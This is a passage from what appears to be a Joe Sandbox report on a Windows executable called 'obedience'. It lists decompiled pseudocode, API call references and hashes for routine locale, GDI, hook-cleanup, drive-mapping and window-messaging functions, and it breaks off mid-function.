      • Instruction ID: 1efd3db1c2be9bddd514659e88fdb6ad086607bbdffeb184261ae6bfe5076f9d
      • Opcode Fuzzy Hash: 9bef555e0ba252e4f153bee74b45bab7266b7c42411ec9f6e12ee93a07049bbd
      • Instruction Fuzzy Hash: 6111E761A4438029DB507F7A8C8DF9B26484B15358F084D7AB944EB3E3CB6CD844C36D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042755C Relevance: 7.6, APIs: 5, Instructions: 55COMMON
      Download Yara Rule
      C-Code - Quality: 40%
      			E0042755C(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x490890 == 0) {
					return _v5;
				} else {
					_push(0);
					L00407658();
					_v12 = __eax;
					_push(_t32);
					_push(0x4275e2);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00407348();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x490890; // 0xc0809fd
						_push(_t18);
						L00407370();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x490890; // 0xc0809fd
						_push(_t21);
						L00407370();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x4275e9);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L004078C0();
					return _t16;
				}
			}













      0x0042755d
      0x0042755f
      0x00427565
      0x00427570
      0x004275f0
      0x00427572
      0x00427572
      0x00427574
      0x00427579
      0x0042757e
      0x0042757f
      0x00427584
      0x00427587
      0x0042758a
      0x0042758c
      0x0042758f
      0x00427590
      0x00427598
      0x0042759d
      0x0042759e
      0x004275a0
      0x004275a2
      0x004275a7
      0x004275a8
      0x004275b5
      0x004275b6
      0x004275b8
      0x004275ba
      0x004275bf
      0x004275c0
      0x004275c5
      0x004275c5
      0x004275cb
      0x004275ce
      0x004275d1
      0x004275d6
      0x004275d9
      0x004275da
      0x004275dc
      0x004275e1
      0x004275e1

      APIs
      • 73BEAC50.USER32(00000000), ref: 00427574
      • 73BEAD70.GDI32(?,00000068,00000000,004275E2,?,00000000), ref: 00427590
      • 73BEAEA0.GDI32(0C0809FD,00000000,00000008,?,?,00000068,00000000,004275E2,?,00000000), ref: 004275A8
      • 73BEAEA0.GDI32(0C0809FD,00000008,00000008,?,0C0809FD,00000000,00000008,?,?,00000068,00000000,004275E2,?,00000000), ref: 004275C0
      • 73BEB380.USER32(00000000,?,004275E9,004275E2,?,00000000), ref: 004275DC
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380
      • String ID:
      • API String ID: 120756276-0
      • Opcode ID: 5980a92291095bee650e6f3ced05f38d73c55a0c11fe7579cb33e930b7418743
      • Instruction ID: 097f5ada2232ac645d083fd088fef1f4185722509756cd8136fbc554a02ccf32
      • Opcode Fuzzy Hash: 5980a92291095bee650e6f3ced05f38d73c55a0c11fe7579cb33e930b7418743
      • Instruction Fuzzy Hash: 2211A531A4C304BFFB15EBA59C42F6D7BA8E705714F5080ABF504AA5C1DA7A6444C729
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040C6A8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
      Download Yara Rule
      C-Code - Quality: 64%
      			E0040C6A8(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40c73f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040C420(GetThreadLocale(), 0x40c754, 0x100b,  &_v8);
				_t29 = E0040938C(0x40c754, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040C5F4, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49076c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040C630, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040C746);
				return E00404A40( &_v8);
			}










      0x0040c6a8
      0x0040c6ab
      0x0040c6b0
      0x0040c6b1
      0x0040c6b6
      0x0040c6b9
      0x0040c6cf
      0x0040c6e1
      0x0040c6eb
      0x0040c6fb
      0x0040c700
      0x0040c705
      0x0040c70a
      0x0040c70a
      0x0040c710
      0x0040c713
      0x0040c713
      0x0040c724
      0x0040c724
      0x0040c72b
      0x0040c72e
      0x0040c731
      0x0040c73e

      APIs
      • GetThreadLocale.KERNEL32(?,00000000,0040C73F,?,?,00000000), ref: 0040C6C0
        • Part of subcall function 0040C420: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C43E
      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040C73F,?,?,00000000), ref: 0040C6F0
      • EnumCalendarInfoA.KERNEL32(Function_0000C5F4,00000000,00000000,00000004), ref: 0040C6FB
      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040C73F,?,?,00000000), ref: 0040C719
      • EnumCalendarInfoA.KERNEL32(Function_0000C630,00000000,00000000,00000003), ref: 0040C724
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Locale$InfoThread$CalendarEnum
      • String ID:
      • API String ID: 4102113445-0
      • Opcode ID: bf7fad09778cf3921f1cb2127e7e30537135791d18a7403da584ceee64560b0c
      • Instruction ID: 0edabc44f08101759ca7b395f24750fd59c6476673de40f7563633dde48efa88
      • Opcode Fuzzy Hash: bf7fad09778cf3921f1cb2127e7e30537135791d18a7403da584ceee64560b0c
      • Instruction Fuzzy Hash: 4E01F234A04205ABE701A7B58C93B6B715CDB89728F210A77F501BB6C2D77CAE004AAD
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00462EA0 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00462EA0() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x490b94 != 0) {
					_t10 =  *0x490b94; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x490b94 = 0;
				if( *0x490b98 != 0) {
					_t2 =  *0x490b90; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x490b8c) {
						_t8 =  *0x490b98; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x490b98; // 0x0
					CloseHandle(_t5);
					 *0x490b98 = 0;
					return 0;
				}
				return 0;
			}







      0x00462ea7
      0x00462ea9
      0x00462eaf
      0x00462eaf
      0x00462eb6
      0x00462ec2
      0x00462ec4
      0x00462eca
      0x00462eda
      0x00462ede
      0x00462ee4
      0x00462ee4
      0x00462ee9
      0x00462eef
      0x00462ef6
      0x00000000
      0x00462ef6
      0x00462efb

      APIs
      • UnhookWindowsHookEx.USER32(00000000), ref: 00462EAF
      • SetEvent.KERNEL32(00000000,004653A6,00000000,0046436B,?,?,?,00000001,0046442B,?,?,?,?), ref: 00462ECA
      • GetCurrentThreadId.KERNEL32 ref: 00462ECF
      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,004653A6,00000000,0046436B,?,?,?,00000001,0046442B,?,?,?,?), ref: 00462EE4
      • CloseHandle.KERNEL32(00000000,00000000,004653A6,00000000,0046436B,?,?,?,00000001,0046442B,?,?,?,?), ref: 00462EEF
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
      • String ID:
      • API String ID: 2429646606-0
      • Opcode ID: 90236d9fd8387fc473fc657ace2a2c1de5ad54aa66cff3a3fda0c12be6803dbc
      • Instruction ID: 87b28704a2e82de7c3876f6976a1f4a6f7748830999cbac75b4e8e13186f45b2
      • Opcode Fuzzy Hash: 90236d9fd8387fc473fc657ace2a2c1de5ad54aa66cff3a3fda0c12be6803dbc
      • Instruction Fuzzy Hash: 80F050B2914540AFD750EBF9ED4AE5632A4A72431DF14453BB128D72E2D778B440C71D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040C758 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E0040C758(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40c922);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404A40(__edx);
				E0040C420(GetThreadLocale(), 0x40c938, 0x1009,  &_v12);
				if(E0040938C(0x40c938, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404D00(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x48e110], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00409B94(_t124 + _t92 - 1, 2, 0x40c93c);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00409B94(_t124 + _t92 - 1, 4, 0x40c94c);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00409B94(_t124 + _t92 - 1, 2, 0x40c964);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404D08(_t122, 0x40c97c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404C28();
												E00404D08(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404D08(_t122, 0x40c970);
										_t92 = _t92 + 1;
									}
								} else {
									E00404D08(_t122, 0x40c95c);
									_t92 = _t92 + 3;
								}
							} else {
								E00404D08(_t122, 0x40c948);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040D7F8(_t124, _t92);
							E00404F60(_t124, _v8, _t92,  &_v20);
							E00404D08(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x490744; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404A94(_t122, _t124);
					} else {
						while(_t92 <= E00404D00(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404C28();
									E00404D08(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040C929);
				return E00404A64( &_v24, 4);
			}























      0x0040c758
      0x0040c75d
      0x0040c75e
      0x0040c75f
      0x0040c760
      0x0040c761
      0x0040c765
      0x0040c767
      0x0040c76b
      0x0040c76c
      0x0040c771
      0x0040c774
      0x0040c777
      0x0040c77e
      0x0040c796
      0x0040c7ae
      0x0040c8f8
      0x0040c8fa
      0x0040c8ff
      0x0040c901
      0x00000000
      0x00000000
      0x0040c817
      0x0040c81c
      0x0040c823
      0x0040c861
      0x0040c866
      0x0040c868
      0x0040c887
      0x0040c88c
      0x0040c88e
      0x0040c8af
      0x0040c8b4
      0x0040c8b6
      0x0040c8cb
      0x0040c8cb
      0x0040c8cd
      0x0040c8d3
      0x0040c8da
      0x0040c8cf
      0x0040c8cf
      0x0040c8d1
      0x0040c8e8
      0x0040c8f2
      0x00000000
      0x00000000
      0x00000000
      0x0040c8d1
      0x0040c8b8
      0x0040c8bf
      0x0040c8c4
      0x0040c8c4
      0x0040c890
      0x0040c897
      0x0040c89c
      0x0040c89c
      0x0040c86a
      0x0040c871
      0x0040c876
      0x0040c876
      0x0040c8f7
      0x0040c8f7
      0x0040c825
      0x0040c82e
      0x0040c83c
      0x0040c846
      0x0040c84b
      0x0040c84b
      0x0040c823
      0x0040c7b4
      0x0040c7b4
      0x0040c7b9
      0x0040c7bc
      0x0040c7ca
      0x0040c7c6
      0x0040c7c6
      0x0040c7c6
      0x0040c7ce
      0x0040c809
      0x0040c7d0
      0x0040c7f5
      0x0040c7d6
      0x0040c7d6
      0x0040c7d8
      0x0040c7da
      0x0040c7dc
      0x0040c7e5
      0x0040c7ef
      0x0040c7ef
      0x0040c7dc
      0x0040c7f4
      0x0040c7f4
      0x0040c7f4
      0x0040c800
      0x0040c7ce
      0x0040c907
      0x0040c909
      0x0040c90c
      0x0040c90f
      0x0040c921

      APIs
      • GetThreadLocale.KERNEL32(?,00000000,0040C922,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C787
        • Part of subcall function 0040C420: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C43E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Locale$InfoThread
      • String ID: eeee$ggg$yyyy
      • API String ID: 4232894706-1253427255
      • Opcode ID: b005bbb43cbd58ecc22ec0173e37a4ea2652d8ffc49779c81ba8086e7235038a
      • Instruction ID: f016c298c3575a6554fe4c088fae9ffd98c4ad1e01a8414faab90444f8feea09
      • Opcode Fuzzy Hash: b005bbb43cbd58ecc22ec0173e37a4ea2652d8ffc49779c81ba8086e7235038a
      • Instruction Fuzzy Hash: 8E41D3B2704105CBD711B76998C16BEB296DFC5308B60863BE451B33D2D73CAD02A62D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0047BFC4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
      Download Yara Rule
      C-Code - Quality: 73%
      			E0047BFC4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char* _t43;
				intOrPtr* _t66;
				intOrPtr _t74;
				void* _t85;
				char _t86;
				intOrPtr _t103;
				void* _t112;
				void* _t114;
				void* _t117;

				_v532 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t114 = __ecx;
				_t112 = __edx;
				_t85 = __eax;
				_push(_t117);
				_push(0x47c159);
				_push( *[fs:eax]);
				 *[fs:eax] = _t117 + 0xfffffde8;
				E00404A40(__ecx);
				E0040508C( &_v8, 0x400);
				if(_t112 != 0) {
					E00404C38( &_v532, _t112);
					E00404D4C( &_v12, _v532, "\\Device\\");
					_t86 = 0x41;
					do {
						_t43 =  &_v536;
						 *((char*)(_t43 + 1)) = _t86;
						 *_t43 = 1;
						E0040337C( &_v540,  &_v536);
						E0040334C( &_v540, 2, 0x47c1a4);
						E00404CA4( &_v16,  &_v540);
						E00407A30();
						if(QueryDosDeviceA(E00404F00(_v16),  &_v528, 0x1ff) != 0 && E00408EFC(E00404F00(_v12),  &_v528) == 0) {
							E00404A94(_t114, _v16);
						}
						_t86 = _t86 + 1;
					} while (_t86 < 0x5a);
					L8:
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x47c160);
					E00404A40( &_v532);
					return E00404A64( &_v16, 3);
				}
				_t66 =  *0x48f538; // 0x490c50
				E0047FD7C( *_t66, _t85, 0, "GetDeviceNameByDeviceAddress", _t112, _t114, __fp0);
				_push(E00404F00(_v8));
				_push( *((intOrPtr*)(_t85 + 4)));
				_push( *((intOrPtr*)(_t85 + 3)));
				_push( *((intOrPtr*)(_t85 + 2)));
				_t74 =  *((intOrPtr*)(_t85 + 1));
				_push(_t74);
				L00465DD4();
				if(_t74 == 0) {
					E00404C38( &_v8, E00404F00(_v8));
					E00404FA0( &_v8, 4, 1);
					E00404A94(_t114, _v8);
				}
				goto L8;
			}



















      0x0047bfd2
      0x0047bfd8
      0x0047bfdb
      0x0047bfde
      0x0047bfe1
      0x0047bfe3
      0x0047bfe5
      0x0047bfe9
      0x0047bfea
      0x0047bfef
      0x0047bff2
      0x0047bff7
      0x0047c004
      0x0047c00b
      0x0047c081
      0x0047c094
      0x0047c099
      0x0047c09b
      0x0047c09b
      0x0047c0a3
      0x0047c0a6
      0x0047c0b5
      0x0047c0c7
      0x0047c0d5
      0x0047c0e5
      0x0047c106
      0x0047c124
      0x0047c124
      0x0047c129
      0x0047c12a
      0x0047c133
      0x0047c135
      0x0047c138
      0x0047c13b
      0x0047c146
      0x0047c158
      0x0047c158
      0x0047c00d
      0x0047c01b
      0x0047c028
      0x0047c02c
      0x0047c030
      0x0047c034
      0x0047c035
      0x0047c038
      0x0047c039
      0x0047c040
      0x0047c053
      0x0047c065
      0x0047c06f
      0x0047c06f
      0x00000000

      APIs
      • StarBurn_GetDeviceNameByDeviceAddress.STARBURN(?,?,?,?,00000000,00000000,0047C159), ref: 0047C039
      • QueryDosDeviceA.KERNEL32(00000000,?,000001FF), ref: 0047C0FF
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Device$AddressBurn_NameQueryStar
      • String ID: GetDeviceNameByDeviceAddress$\Device\
      • API String ID: 3412940214-1850406243
      • Opcode ID: 9fc7f0954599a777c1cc60587033250be0a7bab543de7d307c5fd966cbac35c3
      • Instruction ID: f02919aed20942ec0b740d542c18dd7e5c0a80d9b67f94e0639826cab4e13efd
      • Opcode Fuzzy Hash: 9fc7f0954599a777c1cc60587033250be0a7bab543de7d307c5fd966cbac35c3
      • Instruction Fuzzy Hash: B341AB74A441089FDB10EF65D8C16CEB7B9DF88304F5080BBA508E7256DB789E458F6C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00472AF8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106windowCOMMON
      Download Yara Rule
      C-Code - Quality: 76%
      			E00472AF8(intOrPtr __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				int _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				intOrPtr _t37;
				intOrPtr _t56;
				intOrPtr _t68;
				int _t73;
				int _t74;
				int _t79;
				intOrPtr _t80;
				void* _t84;
				int _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;

				_t79 = __edx;
				_t88 = _t89;
				_t90 = _t89 + 0xffffffe0;
				_v36 = 0;
				_t86 = __edx;
				_v8 = __eax;
				_push(_t88);
				_push(0x472c4b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v12 = __edx;
				_t37 =  *((intOrPtr*)(_v8 + 0x18));
				if(_t37 == 0) {
					_t79 = 1;
					_v20 = E00403BC0(1);
				} else {
					_v20 = _t37;
				}
				_v16 = _v20;
				_push(_t88);
				_push(0x472c2e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v32 =  &_v16;
				_v24 = E00472A04;
				_v28 = 0;
				_t84 = E0041C1A4(_t86);
				if( *((char*)(_v8 + 0x14)) == 0) {
					_t73 = 2;
				} else {
					_t73 = 1;
				}
				SendMessageA(E0044B158( *((intOrPtr*)(_v8 + 0x10))), 0x449, _t73,  &_v32);
				if(_t73 == 2 && _v28 != 0) {
					asm("cdq");
					E0041C1C4(_t86, _t84, _t79);
					if( *((char*)(_v8 + 0x14)) == 0) {
						_t74 = 1;
					} else {
						_t74 = 2;
					}
					SendMessageA(E0044B158( *((intOrPtr*)(_v8 + 0x10))), 0x449, _t74,  &_v32);
					if(_v28 != 0) {
						_t68 =  *0x48f864; // 0x466c68
						E00406A3C(_t68, 0,  &_v36);
						E0040CBEC(_v36, 1);
						E004043D0();
					}
				}
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x472c35);
				_t56 = _v8;
				if( *((intOrPtr*)(_t56 + 0x18)) != 0) {
					return _t56;
				} else {
					return E00403BF0(_v20);
				}
			}























      0x00472af8
      0x00472af9
      0x00472afb
      0x00472b03
      0x00472b06
      0x00472b08
      0x00472b0d
      0x00472b0e
      0x00472b13
      0x00472b16
      0x00472b19
      0x00472b1f
      0x00472b24
      0x00472b37
      0x00472b3e
      0x00472b26
      0x00472b26
      0x00472b26
      0x00472b44
      0x00472b49
      0x00472b4a
      0x00472b4f
      0x00472b52
      0x00472b58
      0x00472b60
      0x00472b65
      0x00472b6f
      0x00472b78
      0x00472b81
      0x00472b7a
      0x00472b7a
      0x00472b7a
      0x00472b9c
      0x00472ba4
      0x00472bae
      0x00472bb3
      0x00472bbf
      0x00472bc8
      0x00472bc1
      0x00472bc1
      0x00472bc1
      0x00472be3
      0x00472bec
      0x00472bf1
      0x00472bf6
      0x00472c05
      0x00472c0a
      0x00472c0a
      0x00472bec
      0x00472c11
      0x00472c14
      0x00472c17
      0x00472c1c
      0x00472c23
      0x00472c2d
      0x00472c25
      0x00000000
      0x00472c28

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID: TsA$hlF
      • API String ID: 3850602802-2645589683
      • Opcode ID: eebda259ea33f81a96385061153047f765f2b03fef2eb9bcce3897491fa5ac3c
      • Instruction ID: 65c04a079f4804e9f5c118b37566fdf300e76784480acfe307d168b6e554fe39
      • Opcode Fuzzy Hash: eebda259ea33f81a96385061153047f765f2b03fef2eb9bcce3897491fa5ac3c
      • Instruction Fuzzy Hash: 09416F70A002089FDB11DF59CD85AEEB7F9EB08304F118866F904E7391D778AE40DB99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00472F98 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89COMMON
      Download Yara Rule
      C-Code - Quality: 77%
      			E00472F98(char __edx, void* __edi, void* __fp0) {
				char _v5;
				void* __ecx;
				void* __ebp;
